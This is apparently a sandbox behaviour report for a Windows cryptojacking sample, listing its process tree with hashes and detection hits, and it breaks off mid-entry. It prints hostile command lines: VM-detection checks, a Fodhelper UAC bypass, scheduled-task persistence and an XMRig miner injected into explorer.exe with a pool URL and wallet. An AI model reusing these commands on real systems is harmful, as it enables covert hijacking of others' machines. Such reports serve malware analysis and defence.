MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 1
Start time: 18:23:51
Start date: 07/10/2024
Path: C:\Users\user\Desktop\e7WMhx18XN.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\e7WMhx18XN.exe"
Imagebase: 0x510000
File size: 8'201'216 bytes
MD5 hash: 38BE83AFEA1E906C05E5B851253CBC6A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 2
Start time: 18:23:51
Start date: 07/10/2024
Path: C:\Windows\System32\Sgrmuserer.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\Sgrmuserer.exe
Imagebase: 0x7ff657620000
File size: 329'504 bytes
MD5 hash: 3BA1A18A0DC30A0545E7765CB97D8E63
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 6
Start time: 18:23:51
Start date: 07/10/2024
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
Imagebase: 0x7ff7df220000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 7
Start time: 18:23:52
Start date: 07/10/2024
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k wsappx -p -s ClipSVC
Imagebase: 0x7ff7df220000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 8
Start time: 18:23:57
Start date: 07/10/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\b.bat" "
Imagebase: 0x7ff6794d0000
                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:9
                                                                                                                                                        Start time:18:23:57
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff620390000
                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:10
                                                                                                                                                        Start time:18:23:57
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\paint.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\paint.exe"
                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                        File size:2'234'368 bytes
                                                                                                                                                        MD5 hash:9CA610EB2F785C8D2DDF2A50347039ED
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Yara matches:
                                                                                                                                                        • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 0000000A.00000002.1356435328.0000000000A73000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                        • Rule: Windows_Trojan_Donutloader_5c38878d, Description: unknown, Source: 0000000A.00000002.1356435328.0000000000A73000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                        Antivirus matches:
                                                                                                                                                        • Detection: 100%, Avira
                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                        Reputation:low
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:11
                                                                                                                                                        Start time:18:23:57
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:wmic diskdrive get Model
                                                                                                                                                        Imagebase:0x7ff67a220000
                                                                                                                                                        File size:576'000 bytes
                                                                                                                                                        MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:moderate
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:12
                                                                                                                                                        Start time:18:23:57
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exe"
                                                                                                                                                        Imagebase:0x7ff6cf670000
                                                                                                                                                        File size:11'776 bytes
                                                                                                                                                        MD5 hash:9EB62648C9CC2F1EDD3E9CEF736F9C5C
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:low
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:13
                                                                                                                                                        Start time:18:23:57
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\findstr.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
                                                                                                                                                        Imagebase:0x7ff71fdd0000
                                                                                                                                                        File size:36'352 bytes
                                                                                                                                                        MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:moderate
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:14
                                                                                                                                                        Start time:18:23:57
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:/c C:\Windows\System32\fodhelper.exe
                                                                                                                                                        Imagebase:0x7ff6794d0000
                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:15
                                                                                                                                                        Start time:18:23:57
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff620390000
                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:16
                                                                                                                                                        Start time:18:23:57
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\fodhelper.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\System32\fodhelper.exe
                                                                                                                                                        Imagebase:0x7ff6b0580000
                                                                                                                                                        File size:49'664 bytes
                                                                                                                                                        MD5 hash:85018BE1FD913656BC9FF541F017EACD
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:18
                                                                                                                                                        Start time:18:23:58
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:"cmd.exe"
                                                                                                                                                        Imagebase:0x7ff6794d0000
                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:false

                                                                                                                                                        Target ID:19
                                                                                                                                                        Start time:18:23:59
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff620390000
                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:false

                                                                                                                                                        Target ID:20
                                                                                                                                                        Start time:18:24:00
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\paint.exe"
Imagebase:0x7ff620390000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000014.00000002.1397583794.00000113DAF00000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
• Rule: Windows_Trojan_Donutloader_5c38878d, Description: unknown, Source: 00000014.00000002.1397583794.00000113DAF00000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
Has exited:true

Target ID:21
Start time:18:24:02
Start date:07/10/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe"
Imagebase:0x7ff6794d0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:22
Start time:18:24:02
Start date:07/10/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff620390000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:23
Start time:18:24:02
Start date:07/10/2024
Path:C:\Windows\System32\schtasks.exe
Wow64 process (32bit):false
Commandline:schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe"
Imagebase:0x7ff7c0d70000
File size:235'008 bytes
MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:24
Start time:18:24:03
Start date:07/10/2024
Path:C:\Users\user\AppData\Local\Temp\services64.exe
Wow64 process (32bit):false
Commandline:C:\Users\user\AppData\Local\Temp\services64.exe
Imagebase:0x400000
File size:2'234'368 bytes
MD5 hash:9CA610EB2F785C8D2DDF2A50347039ED
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000018.00000002.1422444536.0000000000B7B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: Windows_Trojan_Donutloader_5c38878d, Description: unknown, Source: 00000018.00000002.1422444536.0000000000B7B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
Has exited:true

Target ID:25
Start time:18:24:04
Start date:07/10/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"cmd" cmd /c "C:\Users\user\AppData\Local\Temp\services64.exe"
Imagebase:0x7ff6794d0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:26
Start time:18:24:04
Start date:07/10/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff620390000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:27
Start time:18:24:04
Start date:07/10/2024
Path:C:\Users\user\AppData\Local\Temp\services64.exe
Wow64 process (32bit):false
Commandline:C:\Users\user\AppData\Local\Temp\services64.exe
Imagebase:0x400000
File size:2'234'368 bytes
MD5 hash:9CA610EB2F785C8D2DDF2A50347039ED
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 0000001B.00000002.1427320159.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: Windows_Trojan_Donutloader_5c38878d, Description: unknown, Source: 0000001B.00000002.1427320159.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
Has exited:true

Target ID:29
Start time:18:24:06
Start date:07/10/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe"
Imagebase:0x7ff620390000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001D.00000003.1512941310.0000012BFEB19000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000001D.00000003.1512941310.0000012BFEB19000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001D.00000003.1503362780.0000012BFEB14000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000001D.00000003.1503362780.0000012BFEB14000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001D.00000003.1516296200.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000001D.00000003.1516296200.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001D.00000003.1491167267.0000012BFEB12000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000001D.00000003.1491167267.0000012BFEB12000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001D.00000003.1504370851.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000001D.00000003.1504370851.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001D.00000003.1510372978.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000001D.00000003.1510372978.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001D.00000003.1485004069.0000012BFEB18000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000001D.00000003.1485004069.0000012BFEB18000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001D.00000003.1493388447.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000001D.00000003.1493388447.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001D.00000003.1515362432.0000012BFEB10000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000001D.00000003.1515362432.0000012BFEB10000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001D.00000003.1500353828.0000012BFEB1F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000001D.00000003.1500353828.0000012BFEB1F000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001D.00000003.1490294728.0000012BFEB18000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000001D.00000003.1490294728.0000012BFEB18000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001D.00000003.1489451873.0000012BFEB13000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000001D.00000003.1489451873.0000012BFEB13000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001D.00000003.1492275711.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000001D.00000003.1492275711.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001D.00000003.1480698288.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000001D.00000003.1480698288.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001D.00000003.1514543598.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000001D.00000003.1514543598.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001D.00000003.1483759497.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000001D.00000003.1483759497.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001D.00000003.1507696835.0000012BFEB1D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000001D.00000003.1507696835.0000012BFEB1D000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001D.00000003.1473812913.0000012BFEB13000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000001D.00000003.1473812913.0000012BFEB13000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001D.00000003.1501988421.0000012BFEB12000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000001D.00000003.1501988421.0000012BFEB12000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001D.00000003.1482207840.0000012BFEB14000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000001D.00000003.1482207840.0000012BFEB14000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001D.00000003.1508918553.0000012BFEB16000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000001D.00000003.1508918553.0000012BFEB16000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001D.00000003.1517174227.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000001D.00000003.1517174227.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001D.00000003.1506306957.0000012BFEB16000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000001D.00000003.1506306957.0000012BFEB16000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001D.00000003.1464746998.0000012BFEB10000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000001D.00000003.1464746998.0000012BFEB10000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:30
                                                                                                                                                        Start time:18:24:07
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:"C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe"
                                                                                                                                                        Imagebase:0x7ff620390000
                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Yara matches:
                                                                                                                                                        • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 0000001E.00000002.1535066654.0000021E7B340000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                        • Rule: Windows_Trojan_Donutloader_5c38878d, Description: unknown, Source: 0000001E.00000002.1535066654.0000021E7B340000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:31
                                                                                                                                                        Start time:18:24:08
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                        File size:31'232 bytes
                                                                                                                                                        MD5 hash:61D09675A406E39F17F2EA03A3CB8CCC
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Yara matches:
                                                                                                                                                        • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 0000001F.00000002.1478641969.0000000000905000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                        • Rule: Windows_Trojan_Donutloader_5c38878d, Description: unknown, Source: 0000001F.00000002.1478641969.0000000000905000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                        Antivirus matches:
                                                                                                                                                        • Detection: 100%, Avira
                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:34
                                                                                                                                                        Start time:18:24:09
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\WerFault.exe -u -p 6140 -s 1052
                                                                                                                                                        Imagebase:0x7ff6b20d0000
                                                                                                                                                        File size:570'736 bytes
                                                                                                                                                        MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:36
                                                                                                                                                        Start time:18:24:12
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:"C:\Windows\System32\conhost.exe" "/sihost64"
                                                                                                                                                        Imagebase:0x7ff620390000
                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:false

                                                                                                                                                        Target ID:37
                                                                                                                                                        Start time:18:24:12
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\explorer.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=426RNxSSEqcPuv4hwEHkJf7kVHFWs8bprQJpMPxDcRx6RTQxZW7rByiXU4CnMDqrHL4s7VEpMG8Qj77ygdDRvkBU3Ncd1Wx --pass= --cpu-max-threads-hint=40 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-stealth
                                                                                                                                                        Imagebase:0x7ff609fd0000
                                                                                                                                                        File size:5'141'208 bytes
                                                                                                                                                        MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:false

                                                                                                                                                        Target ID:38
                                                                                                                                                        Start time:18:24:13
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                        Wow64 process (32bit):false
